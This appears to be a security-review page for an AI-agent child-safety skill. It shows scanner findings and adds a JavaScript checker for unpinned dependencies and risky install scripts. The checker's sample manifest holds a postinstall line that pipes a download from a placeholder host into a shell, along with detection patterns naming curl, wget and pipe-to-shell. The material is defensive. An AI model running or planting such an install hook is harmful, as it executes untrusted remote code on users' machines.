Csam Shield

Security checks across malware telemetry and agentic risk

Overview

This is a legitimate child-safety skill, but it gives agents broad automatic reporting, enforcement, monitoring, and evidence-retention authority that needs human and legal review before use.

Install only if you are an authorized platform safety or legal operator. Independently review the npm package and dependencies, pin verified versions, scope reporting credentials, require jurisdiction-specific legal approval, add human-review gates where legally appropriate, minimize evidence retention, and document appeal or rollback handling for mistaken enforcement.
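The manifest review the checklist above asks for, as an added example that is not the skill's own code or SkillSpector's: it flags the two supply-chain patterns a scanner of this kind looks for, unpinned dependency specifiers and install-time lifecycle scripts that fetch or evaluate remote code. `reviewManifest`, `isPinned` and the sample manifest are assumptions constructed for the demo; against the real package you would replace `SAMPLE_MANIFEST` with `JSON.parse(fs.readFileSync("package.json", "utf8"))`.

```javascript
// Added example: manifest review for the two supply-chain patterns named on
// this page. Not code from the Csam Shield skill or from SkillSpector.

// Exact semver only ("7.5.4", "1.2.3-beta.1"). Ranges, dist-tags and URLs
// resolve to whatever the registry serves at install time, so they are not pins.
const EXACT_SEMVER = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

function isPinned(spec) {
  // "npm:other-name@1.2.3" aliases are pinned when the part after the last "@" is exact.
  const version = spec.startsWith("npm:") ? spec.slice(spec.lastIndexOf("@") + 1) : spec;
  return EXACT_SEMVER.test(version);
}

// Lifecycle hooks npm runs on the installer's machine without asking.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Script fragments that download or evaluate code the manifest does not contain.
const FETCH_PATTERNS = [/\bcurl\b/, /\bwget\b/, /https?:\/\//, /\|\s*(sh|bash)\b/, /\beval\b/, /base64/];

// Returns one finding per issue: { severity, category, detail }.
function reviewManifest(pkg) {
  const findings = [];
  for (const section of ["dependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      if (!isPinned(spec)) {
        findings.push({ severity: "medium", category: "unpinned-dependency", detail: `${section}.${name} = "${spec}"` });
      }
    }
  }
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    const fetches = FETCH_PATTERNS.some((re) => re.test(scripts[hook]));
    findings.push({
      severity: fetches ? "high" : "medium",
      category: fetches ? "external-script-fetch" : "lifecycle-script",
      detail: `scripts.${hook} = "${scripts[hook]}"`,
    });
  }
  return findings;
}

// Constructed manifest for the demo (names, versions and URLs are made up).
// The real package.json is read with JSON.parse(fs.readFileSync("package.json", "utf8")).
const SAMPLE_MANIFEST = {
  name: "example-safety-skill",
  version: "0.1.0",
  dependencies: {
    semver: "7.5.4",                                          // pinned
    lodash: "^4.17.21",                                       // caret range: floats across 4.x
    "left-pad": "latest",                                     // dist-tag: newest at install time
    "helper-lib": "git+https://git.example.invalid/helper-lib.git", // branch tip, no commit pin
    "alias-pkg": "npm:real-pkg@2.0.0",                        // alias with exact version: pinned
  },
  scripts: {
    test: "node test.js",
    postinstall: "curl -fsSL https://example.invalid/setup.sh | sh",
  },
};

for (const f of reviewManifest(SAMPLE_MANIFEST)) {
  console.log(`[${f.severity}] ${f.category}: ${f.detail}`);
}
```

On the sample manifest this reports three unpinned dependencies and one high-severity postinstall that pipes a download into `sh`. A git URL that ends in a full commit hash is a reasonable pin in practice but is still flagged here; extend `isPinned` if you want to accept it. The check complements, rather than replaces, installing from a reviewed lockfile with `npm ci --ignore-scripts` and inspecting the tarball produced by `npm pack` before running anything from it.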

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (1)

Natural-Language Policy Violations

Severity: Medium
Confidence: 95%
Finding
The skill hard-codes U.S.-centric reporting and legal obligations (for example mandatory NCMEC reporting under 18 USC § 2258A) as if they universally apply, without requiring jurisdiction selection or clarifying regional applicability. In a safety-critical moderation workflow, this can cause unlawful or inappropriate disclosure, incorrect escalation paths, and compliance failures for operators outside the intended legal regime.

VirusTotal

None of the 66 VirusTotal vendors flagged this skill as malicious. A clean antivirus result only means the package matched no known-malware signatures; it says nothing about the policy and excessive-agency concerns raised above.
